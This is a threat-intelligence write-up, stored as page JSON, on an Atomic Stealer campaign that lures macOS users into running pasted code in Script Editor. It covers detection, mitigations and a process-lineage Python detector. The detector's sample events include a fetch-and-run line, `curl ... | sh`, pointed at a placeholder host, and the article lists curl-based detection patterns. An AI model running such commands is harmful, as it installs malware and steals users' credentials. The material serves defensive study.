[{"data":1,"prerenderedAt":149},["ShallowReactive",2],{"article-slug-atomic-stealer-targets-macos-with-new-clickfix-attack":3,"articles-index":-1},{"id":4,"slug":5,"headline":6,"title":7,"summary":8,"full_report":9,"twitter_post":10,"meta_description":11,"category":12,"severity":16,"entities":17,"cves":34,"sources":35,"events":48,"mitre_techniques":49,"mitre_mitigations":67,"d3fend_countermeasures":111,"iocs":116,"cyber_observables":117,"tags":134,"extract_datetime":140,"article_type":141,"impact_scope":142,"pub_date":39,"reading_time_minutes":148,"createdAt":140,"updatedAt":140},"63295c07-5050-4fca-9da2-23e7ef03d2c1","atomic-stealer-targets-macos-with-new-clickfix-attack","Atomic Stealer Malware Bypasses macOS Warnings with New 'ClickFix' Attack Vector","Atomic Stealer Evolves 'ClickFix' Tactic to Target macOS Users via Apple's Script Editor","A new malware campaign is delivering the Atomic Stealer (AMOS) infostealer to macOS users by evolving the 'ClickFix' social engineering technique. To bypass recent security warnings Apple added to the Terminal application, threat actors are now tricking users into launching Apple's built-in Script Editor and pasting malicious code. The attack, identified by Jamf Threat Labs, uses convincing browser pop-ups to guide victims through a fake troubleshooting workflow, ultimately leading to the installation of the AMOS infostealer and a persistent backdoor.","## Executive Summary\n\nThreat actors distributing the **[Atomic Stealer](https://malpedia.caad.fkie.fraunhofer.de/details/osx.atomic) (AMOS)** infostealer have adapted their tactics to bypass recent security enhancements in macOS. According to researchers at **[Jamf](https://www.jamf.com/)** Threat Labs, a new campaign is using an evolved version of the \"ClickFix\" social engineering attack. 
Instead of tricking users into pasting malicious commands into the Terminal, which now triggers a security warning in macOS 26.4, the attackers now guide victims to use **[Apple's](https://www.apple.com)** built-in Script Editor. This demonstrates the continuous cat-and-mouse game between platform vendors and malware authors, where attackers quickly find alternative paths to achieve their goals once a vector is closed.\n\n---\n\n## Threat Overview\n\n**Atomic Stealer** is a potent infostealer designed specifically to target macOS, capable of harvesting a wide range of sensitive data, including browser passwords, cookies, crypto wallets, and system information. The \"ClickFix\" attack is a social engineering method that relies on deception rather than a software vulnerability.\n\nThe new attack chain is as follows:\n1.  **Lure:** The victim encounters a full-window browser pop-up that convincingly mimics an official Apple system alert. The pop-up claims to offer a way to reclaim disk space or fix a system issue.\n2.  **Social Engineering:** The user is guided through a series of steps, presented as a legitimate troubleshooting process.\n3.  **Vector Switch:** Instead of instructing the user to open the Terminal, the instructions now direct them to open the Script Editor application, which is included with macOS.\n4.  **Execution:** The user is told to paste a block of malicious code (likely AppleScript or a shell script wrapper) into the Script Editor and run it. Since Script Editor is a trusted Apple application designed to run code, it does not trigger the same warnings as pasting into the Terminal.\n5.  **Payload Delivery:** Running the script downloads and installs the AMOS infostealer and a backdoor for persistent access.\n\n## Technical Analysis\n\nThis campaign is a clear example of attackers adapting to new defenses. Apple's introduction of a warning for pasting commands into the Terminal in macOS 26.4 was a meaningful security improvement. 
However, the attackers simply pivoted to another built-in application that can execute code.\n\n- **Abuse of Trusted Application:** The core of the technique is abusing the inherent trust and functionality of Script Editor. The user executes the code themselves, which ATT&CK classifies under User Execution; the sub-technique that describes pasting attacker-supplied code into a built-in interpreter is [`T1204.004 - User Execution: Malicious Copy and Paste`](https://attack.mitre.org/techniques/T1204/004/). Malicious Link (T1204.001) and Malicious File (T1204.002) are weaker fits, since the payload arrives as clipboard text rather than as a downloaded file.\n- **AppleScript/Shell Script:** The payload pasted into Script Editor is likely an AppleScript that contains a `do shell script` command, a technique covered under [`T1059.002 - Command and Scripting Interpreter: AppleScript`](https://attack.mitre.org/techniques/T1059/002/). `do shell script` hands its argument to `/bin/sh -c`, spawned as a child of whichever process is running the script. Script Editor runs AppleScript in its own process, so when the user clicks Run, the shell's parent is `Script Editor.app` itself rather than `osascript`; `osascript` only appears when the script is run from the command line. The shell then typically uses `curl` to fetch and run the main AMOS binary (macOS ships `curl` but not `wget`).\n- **Defense Evasion:** By using Script Editor, the attackers bypass the specific defense Apple implemented for the Terminal. The paste warning is tied to one application; any other built-in interpreter with a paste-and-run workflow sits outside it, so the fix closed a vector rather than the class of attack.\n\n## Impact Assessment\n\nA successful infection with Atomic Stealer can lead to a complete compromise of the victim's digital life and credentials.\n- **Credential Theft:** AMOS can steal passwords, cookies, and session tokens from all major browsers, giving attackers access to email, social media, banking, and corporate accounts.\n- **Financial Theft:** The malware specifically targets cryptocurrency wallets, enabling direct financial theft.\n- **Full System Access:** The installation of a backdoor provides the attacker with persistent access to the compromised Mac, allowing them to install further malware, spy on the user, or use the machine as part of a botnet.\n\n## IOCs\n\nNo specific IOCs were provided in the summary articles.\n\n## Detection & Response\n\nDetection relies on process lineage (which process spawned the shell) and outbound network connections rather than on the script text, which the attackers can change at will.\n\n1.  
**Process Monitoring:** Use an EDR or Endpoint Security client for macOS that records process execution with parent lineage. The chain to look for is `Script Editor` (executable path `/System/Applications/Utilities/Script Editor.app/Contents/MacOS/Script Editor`) or `osascript` spawning `/bin/sh`, which is how `do shell script` runs its argument, followed by that shell or a child such as `curl` making an outbound connection or writing a Mach-O or a `.plist` to disk. A rule keyed on the `osascript` process alone misses this campaign: Script Editor executes AppleScript in-process, so no `osascript` is involved when the user clicks Run.\n2.  **Network Monitoring:** Monitor for network connections to known AMOS C2 servers. Threat intelligence feeds should be updated with the latest indicators for this malware family; where the C2 is new, the process-lineage rule above is what fires.\n3.  **Unified Logging and FIM:** The unified log (`log show`) has no general process-execution or file-creation audit trail, so it is a poor primary source here. Use Endpoint Security `exec`, `fork` and `create` events (which EDRs consume) for lineage, and apply file integrity monitoring to `~/Library/LaunchAgents/` and `/tmp/`, the directories AMOS uses for persistence and staging.\n\n**D3FEND Reference:** Detection would involve [`D3-PA - Process Analysis`](https://d3fend.mitre.org/technique/d3f:ProcessAnalysis) to watch for Script Editor or `osascript` spawning shell processes that download files, and [`D3-NTA - Network Traffic Analysis`](https://d3fend.mitre.org/technique/d3f:NetworkTrafficAnalysis) to spot the C2 communication.\n\n## Mitigation\n\nSince this is a social engineering attack, user awareness is the primary mitigation.\n\n- **User Education:** Train users to be extremely skeptical of any browser pop-up or message that instructs them to manually copy and paste code into any application, whether it's Terminal, Script Editor, or anything else. Legitimate troubleshooting rarely, if ever, involves this step, and a web page cannot legitimately diagnose disk-space or system problems.\n- **Endpoint Protection (EPP/EDR):** Deploy a modern EPP/EDR solution for macOS that can detect and block known malware like Atomic Stealer based on its behavior and signatures.\n- **Principle of Least Privilege:** Ensure users do not run with administrative privileges for daily tasks. This attack needs no admin rights: a user-level LaunchAgent in `~/Library/LaunchAgents/` is enough for persistence, and the browser profiles and wallet files AMOS targets are owned by the user. A standard account still prevents system-wide persistence (LaunchDaemons) and other root-level changes, so it limits follow-on damage rather than the initial theft.\n\n**D3FEND Reference:** The most effective countermeasure is user-focused. While not a direct D3FEND technique, this aligns with the principle of hardening the human element. 
Technically, [`D3-EDL - Executable Denylisting`](https://d3fend.mitre.org/technique/d3f:ExecutableDenylisting) could be used to block Script Editor for most users, but this is often not practical, and it closes only one of several built-in AppleScript hosts.","macOS users targeted: Atomic Stealer (AMOS) malware now uses a new 'ClickFix' attack, tricking users into pasting malicious code into Apple's Script Editor to bypass recent Terminal security warnings. 🍎 #macOS #Malware #AtomicStealer #CyberSecurity","A new Atomic Stealer (AMOS) campaign targeting macOS bypasses Apple's security warnings by tricking users into running malicious code in the Script Editor instead of the Terminal.",[13,14,15],"Malware","Phishing","Mobile Security","high",[18,22,26,29,32],{"name":19,"type":20,"url":21},"Atomic Stealer (AMOS)","malware","https://malpedia.caad.fkie.fraunhofer.de/details/osx.atomic",{"name":23,"type":24,"url":25},"Apple","vendor","https://www.apple.com/",{"name":27,"type":28},"macOS","product",{"name":30,"type":31},"Jamf Threat Labs","security_organization",{"name":33,"type":28},"Apple Script Editor",[],[36,42],{"url":37,"title":38,"date":39,"friendly_name":40,"website":41},"https://www.infosecurity-magazine.com/news/atomic-stealer-macos-clickfix/","Atomic Stealer MacOS ClickFix Attack Bypasses Apple Security Warnings","2026-04-09","Infosecurity Magazine","infosecurity-magazine.com",{"url":43,"title":44,"date":45,"friendly_name":46,"website":47},"https://www.jahnf.de/2026/04/08/neue-macos-malware-umgeht-apples-schutzmassnahmen/","New macOS malware circumvents Apple's protective measures","2026-04-08","Jahnf.de","jahnf.de",[],[50,54,57,61,64],{"id":51,"name":52,"tactic":53},"T1204.004","User Execution: Malicious Copy and Paste","Execution",{"id":55,"name":56,"tactic":53},"T1059.002","Command and Scripting Interpreter: AppleScript",{"id":58,"name":59,"tactic":60},"T1555.003","Credentials from Password Stores: Credentials from Web Browsers","Credential Access",{"id":62,"name":63,"tactic":60},"T1539","Steal Web Session 
Cookie",{"id":65,"name":66,"tactic":60},"T1552.006","Credentials in Browser",[68,73,90],{"id":69,"name":70,"description":71,"domain":72},"M1017","User Training","The most effective mitigation is training users to recognize the social engineering tactic and to never copy/paste code from an untrusted source into any application.","enterprise",{"id":74,"name":75,"d3fend_techniques":76,"description":89,"domain":72},"M1049","Antivirus/Antimalware",[77,81,85],{"id":78,"name":79,"url":80},"D3-FCR","File Content Rules","https://d3fend.mitre.org/technique/d3f:FileContentRules",{"id":82,"name":83,"url":84},"D3-FH","File Hashing","https://d3fend.mitre.org/technique/d3f:FileHashing",{"id":86,"name":87,"url":88},"D3-PA","Process Analysis","https://d3fend.mitre.org/technique/d3f:ProcessAnalysis","Deploy a reputable EDR/EPP solution for macOS that can detect and block Atomic Stealer and its behaviors.",{"id":91,"name":92,"d3fend_techniques":93,"description":110,"domain":72},"M1038","Execution Prevention",[94,98,102,106],{"id":95,"name":96,"url":97},"D3-DLIC","Driver Load Integrity Checking","https://d3fend.mitre.org/technique/d3f:DriverLoadIntegrityChecking",{"id":99,"name":100,"url":101},"D3-EAL","Executable Allowlisting","https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting",{"id":103,"name":104,"url":105},"D3-EDL","Executable Denylisting","https://d3fend.mitre.org/technique/d3f:ExecutableDenylisting",{"id":107,"name":108,"url":109},"D3-PSEP","Process Segment Execution Prevention","https://d3fend.mitre.org/technique/d3f:ProcessSegmentExecutionPrevention","In high-security environments, consider using application control to block the use of Script Editor for all non-developer users.",[112,114],{"technique_id":86,"technique_name":87,"url":88,"recommendation":113,"mitre_mitigation_id":74},"To counter the evolved 'ClickFix' attack, defenders should use Process Analysis to monitor for the specific, anomalous behavior of the Apple Script Editor. 
A key detection rule would be to alert whenever `Script Editor` or `osascript` spawns `/bin/sh` (the process `do shell script` always uses) and that shell, or a child of it, invokes `curl` or opens an outbound connection. Script Editor runs AppleScript inside its own process, so a rule that looks only for `osascript` will not see scripts run from the app; the parent of the shell is `Script Editor.app` itself. macOS ships `curl` but not `wget`, so `curl` is the expected downloader. This is a strong indicator of a script attempting to fetch a second-stage payload. Furthermore, an EDR solution should be configured to analyze the chain of events: User launches Script Editor -> Script Editor (or `osascript`) spawns a shell -> Shell process or its child makes a network connection and writes a payload or a LaunchAgent `.plist` to disk. This behavioral chain is highly indicative of the AMOS campaign and allows for detection regardless of the specific script or payload hash.",{"technique_id":103,"technique_name":104,"url":105,"recommendation":115,"mitre_mitigation_id":91},"Since this attack relies on abusing a legitimate, built-in macOS application, a powerful mitigation for corporate environments is to use Executable Denylisting. Most non-developer users have no legitimate reason to use the Apple Script Editor. Using an MDM solution or EDR platform, administrators can create a policy that prevents the execution of `Script Editor.app` for all users except those in a specific 'developer' group. This removes the tool that the attackers have pivoted to, but it is a narrow control: `osascript`, Automator and Shortcuts can run the same AppleScript, and the Terminal warning only covers pasted commands, so a denylist entry for Script Editor alone merely forces the next pivot. It is most useful paired with the process-lineage detection described under Process Analysis. While this may seem like a blunt instrument, it's an effective way to harden endpoints and reduce the attack surface by removing unnecessary, dual-use tools from standard user machines.",[],[118,124,129],{"type":119,"value":120,"description":121,"context":122,"confidence":123},"process_name","osascript","The command-line tool for executing AppleScript. 
Monitor for its execution when it spawns a shell, and separately monitor for `/bin/sh` children of `Script Editor.app`: Script Editor runs AppleScript in-process, so a `do shell script` issued from the app never passes through `osascript`, and a rule keyed on this process name alone will miss the campaign described here.","EDR process events (Endpoint Security framework).","medium",{"type":125,"value":126,"description":127,"context":128,"confidence":16},"command_line_pattern","do shell script \"curl *\"","A common pattern in malicious AppleScripts where a shell command is used to download a secondary payload from the internet. Because `do shell script` runs its argument as `/bin/sh -c '<command>'`, the `curl` invocation also appears on the shell's command line in EDR telemetry, which is where it can be matched even when the AppleScript source is never written to disk.","Script content analysis, EDR command-line logging.",{"type":130,"value":131,"description":132,"context":133,"confidence":16},"file_path","~/Library/LaunchAgents/","Atomic Stealer and other macOS malware often place .plist files in this directory to establish persistence; no administrative rights are needed to write here.","File Integrity Monitoring (FIM), EDR.",[13,27,135,136,137,138,139],"Atomic Stealer","AMOS","Social Engineering","ClickFix","Infostealer","2026-04-09T15:00:00.000Z","NewsArticle",{"geographic_scope":143,"industries_affected":144,"other_affected":146},"global",[145],"Technology",[147],"macOS users",4,1776260615363]
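The behavioral chain from the Detection & Response section and the D3-PA recommendation above (Script Editor or `osascript` spawning `/bin/sh`, which then downloads, connects out, or drops a LaunchAgent), worked as an added example. This is not Jamf's or the article's code. The event records are constructed to resemble what an Endpoint Security client hands an EDR (exec with parent pid and argv, network connect, file create); their field names, pids, paths and hostnames are assumptions, and the example deliberately includes a Terminal `curl` and a benign `osascript` so the rule's negatives are visible too.

```python
"""Process-lineage detection for the Script Editor ClickFix chain.

Added example, not code from Jamf or the article. The event records below
are constructed to resemble what an Endpoint Security client hands an EDR
(exec with parent pid and argv, network connect, file create); the field
names, pids, paths and hostnames are assumptions.
"""
import os
from collections import defaultdict

# Hosts that execute AppleScript. Script Editor runs scripts in its own
# process, so 'do shell script' children hang directly off the app binary.
SCRIPT_EDITOR = "/System/Applications/Utilities/Script Editor.app/Contents/MacOS/Script Editor"
OSA_HOSTS = {SCRIPT_EDITOR, "/usr/bin/osascript"}
SHELLS = {"/bin/sh", "/bin/bash", "/bin/zsh"}   # 'do shell script' uses /bin/sh -c
DOWNLOADERS = {"curl", "nscurl"}                # macOS ships curl, not wget
LAUNCH_AGENTS = "/Library/LaunchAgents/"        # user-level persistence dir


def index_events(events):
    """Map pid -> exec record and ppid -> [child pids] from exec events."""
    procs, children = {}, defaultdict(list)
    for ev in events:
        if ev["type"] == "exec":
            procs[ev["pid"]] = ev
            children[ev["ppid"]].append(ev["pid"])
    return procs, children


def descendants(pid, children):
    """All pids below pid in the process tree (pid itself excluded)."""
    seen, stack = set(), list(children.get(pid, []))
    while stack:
        p = stack.pop()
        if p not in seen:
            seen.add(p)
            stack.extend(children.get(p, []))
    return seen


def detect_clickfix_chain(events):
    """Alert on: AppleScript host -> /bin/sh, where that shell or anything it
    spawned downloads, connects out, or drops a LaunchAgent plist.
    Returns one alert per 'do shell script' shell, in event order."""
    procs, children = index_events(events)
    alerts = []
    for pid, ev in procs.items():
        parent = procs.get(ev["ppid"])
        if ev["path"] not in SHELLS or parent is None or parent["path"] not in OSA_HOSTS:
            continue
        reasons = []
        # 'do shell script X' executes as: /bin/sh -c 'X', so X is argv[2]
        argv = ev["argv"]
        cmd = argv[2] if len(argv) > 2 and argv[1] == "-c" else ""
        if any(os.path.basename(tok) in DOWNLOADERS for tok in cmd.split()):
            reasons.append("downloader in do-shell-script command")
        subtree = {pid} | descendants(pid, children)
        if any(os.path.basename(procs[p]["path"]) in DOWNLOADERS
               for p in subtree if p in procs):
            reasons.append("downloader process spawned")
        for e in events:
            if e.get("pid") not in subtree:
                continue
            if e["type"] == "connect":
                reasons.append("outbound connection to " + e["dst"])
            elif e["type"] == "create" and LAUNCH_AGENTS in e["path"]:
                reasons.append("LaunchAgent dropped: " + e["path"])
        if reasons:
            alerts.append({"shell_pid": pid,
                           "host": os.path.basename(parent["path"]),
                           "reasons": reasons})
    return alerts


TERMINAL = "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal"
SAMPLE_EVENTS = [  # constructed telemetry, not captured from a real host
    # A: ClickFix run from Script Editor -> sh -c 'curl ... | sh' -> curl + LaunchAgent
    {"type": "exec", "pid": 501, "ppid": 1, "path": SCRIPT_EDITOR, "argv": ["Script Editor"]},
    {"type": "exec", "pid": 512, "ppid": 501, "path": "/bin/sh",
     "argv": ["/bin/sh", "-c", "curl -fsSL https://update.example.invalid/fix.sh | sh"]},
    {"type": "exec", "pid": 513, "ppid": 512, "path": "/usr/bin/curl",
     "argv": ["curl", "-fsSL", "https://update.example.invalid/fix.sh"]},
    {"type": "connect", "pid": 513, "dst": "203.0.113.10:443"},
    {"type": "exec", "pid": 514, "ppid": 512, "path": "/bin/sh", "argv": ["sh"]},
    {"type": "create", "pid": 514, "path": "/Users/alice/Library/LaunchAgents/com.fix.update.plist"},
    # B: developer fetching with curl from Terminal -> no AppleScript host, no alert
    {"type": "exec", "pid": 601, "ppid": 1, "path": TERMINAL, "argv": ["Terminal"]},
    {"type": "exec", "pid": 602, "ppid": 601, "path": "/bin/zsh", "argv": ["-zsh"]},
    {"type": "exec", "pid": 603, "ppid": 602, "path": "/usr/bin/curl", "argv": ["curl", "https://example.invalid/"]},
    {"type": "connect", "pid": 603, "dst": "198.51.100.5:443"},
    # C: benign osascript -e 'do shell script "ls -la"' -> host present, nothing suspicious
    {"type": "exec", "pid": 701, "ppid": 602, "path": "/usr/bin/osascript",
     "argv": ["osascript", "-e", 'do shell script "ls -la"']},
    {"type": "exec", "pid": 702, "ppid": 701, "path": "/bin/sh", "argv": ["/bin/sh", "-c", "ls -la"]},
    # D: Script Editor -> sh -c python3 ... with no curl at all, caught by the connect event
    {"type": "exec", "pid": 801, "ppid": 501, "path": "/bin/sh",
     "argv": ["/bin/sh", "-c", "/usr/bin/python3 -c 'import urllib.request as u; u.urlopen(URL)'"]},
    {"type": "exec", "pid": 802, "ppid": 801, "path": "/usr/bin/python3", "argv": ["python3", "-c", "..."]},
    {"type": "connect", "pid": 802, "dst": "203.0.113.10:8080"},
]

if __name__ == "__main__":
    for alert in detect_clickfix_chain(SAMPLE_EVENTS):
        print(alert)
```

Running the block prints two alerts, both with `host` `Script Editor`: pid 512 (downloader on the command line, `curl` child, outbound connection, LaunchAgent write) and pid 801 (no `curl` anywhere, flagged purely on the connect event). The Terminal `curl` and the `osascript` `ls` produce nothing, which is the point of keying on the shell's parent rather than on `osascript` or `curl` alone.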